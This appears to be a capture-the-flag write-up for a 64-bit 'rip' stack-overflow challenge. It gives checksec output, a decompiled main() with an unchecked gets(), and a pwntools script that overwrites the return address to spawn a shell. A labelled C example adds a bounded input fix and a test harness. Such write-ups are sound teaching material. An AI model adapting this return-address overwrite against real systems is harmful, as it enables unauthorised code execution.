Easy_stack_overflow_3
0xdeadbeef

RIP
Exploit template:
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf = ELF('./XXXX')

def remote_or_local(a):  # choose between the remote target and a local process
    if a == 1:
        ip = str(raw_input('[+]please input ip:'))
        port = int(raw_input('[+]please input port:'))
        return remote(ip, port)  # fixed: the original returned the string "remote('ip',port)" instead of opening a connection
    elif a == 0:
        return elf.process()

sh = remote_or_local(a=0)
RIP
Topic: stack overflow
Analysis:
1. Protection mechanisms:
pwn@47d5989ab5ff ~/Pwn/Buu/rip checksec pwn1
[*] '/home/pwn/Pwn/Buu/rip/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
2. Program information:
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 ELF, 64-bit LSB executable, AMD x86-64, version 1 (SYSV)
3. Code review:
main():
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[15]; // [rsp+1h] [rbp-Fh] BYREF   -- a 15-byte character array s on the stack
  puts("please input");
  gets(s, argv);  // decompiler output: gets() reads into s with no length limit
  puts(s);
  puts("ok,bye!!!");
  return 0;
}
4. Approach:
A simple stack overflow: gets() performs no bounds check, so input longer than the buffer runs past s and the saved rbp and overwrites the return address.
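As an added example (not code from the original writeup), here is a bounded replacement for the unchecked gets(s) call in main(), with a harness that places a guard word after a 15-byte buffer, standing in for the saved rbp and return address, and checks that an over-long line leaves it untouched; bounded_gets, run_read, read_len and guard_survives are hypothetical names and the input lines are constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Bounded replacement for the unchecked gets(s) in main(): reads at most
 * len-1 bytes, strips the newline, and drains the rest of an over-long
 * line. Returns the stored length, or -1 if the line did not fit (the
 * caller then rejects the input instead of trusting a truncated value). */
int bounded_gets(FILE *in, char *buf, size_t len)
{
    if (len == 0 || fgets(buf, (int)len, in) == NULL) {
        if (len) buf[0] = '\0';
        return -1;
    }
    size_t n = strlen(buf);
    if (n && buf[n - 1] == '\n') {        /* whole line fit */
        buf[--n] = '\0';
        return (int)n;
    }
    if (n < len - 1)                      /* EOF without newline, still fit */
        return (int)n;
    int c = fgetc(in);                    /* buffer full: did the line end here? */
    if (c == EOF || c == '\n')
        return (int)n;
    while ((c = fgetc(in)) != EOF && c != '\n')   /* no: discard the overflowed tail */
        ;
    return -1;
}

/* Test frame: a 15-byte buffer (same size as s[] in main) followed by a
 * guard word standing in for the saved rbp / return address. Feeds a
 * constructed line through a memory-backed FILE and reports whether the
 * guard survived the read. */
static int run_read(const char *line, int *guard_intact)
{
    struct { char s[15]; unsigned long guard; } frame;
    const unsigned long marker = 0xdeadbeefcafef00dUL; /* arbitrary constructed value */
    frame.guard = marker;
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (!in) { *guard_intact = 0; return -1; }
    int got = bounded_gets(in, frame.s, sizeof frame.s);
    fclose(in);
    *guard_intact = (frame.guard == marker);
    return got;
}

int read_len(const char *line)       { int g; return run_read(line, &g); }
int guard_survives(const char *line) { int g; run_read(line, &g); return g; }
```

With the original gets() the same 40-byte line would have written straight through the guard word; here the read stops at 14 bytes and reports truncation.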
5. Dynamic debugging:
6. Exploit construction (python2):
# -*- coding: UTF-8 -*-
# by 小渔xiaoyu
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf = ELF('./pwn1')

def remote_or_local(a):
    if a == 1:
        ip = str(raw_input('[+]please input ip:'))
        port = int(raw_input('[+]please input port:'))
        return remote(ip, port)  # fixed: the original returned a string instead of a tube
    elif a == 0:
        return elf.process()

sh = remote_or_local(a=0)
shell_addr = 0x0401186
# s[15] sits at rbp-0xf: 0xf bytes of buffer plus 8 bytes of saved rbp reach the return address
payload = 'A' * (0xf + 0x8) + p64(shell_addr)
sh.recvuntil('please input')
sh.sendline(payload)
sh.interactive()
If anything in this article is wrong, corrections from fellow practitioners are welcome ^^
This article represents the independent views of 0xdeadbeef; reproduction without authorization is prohibited.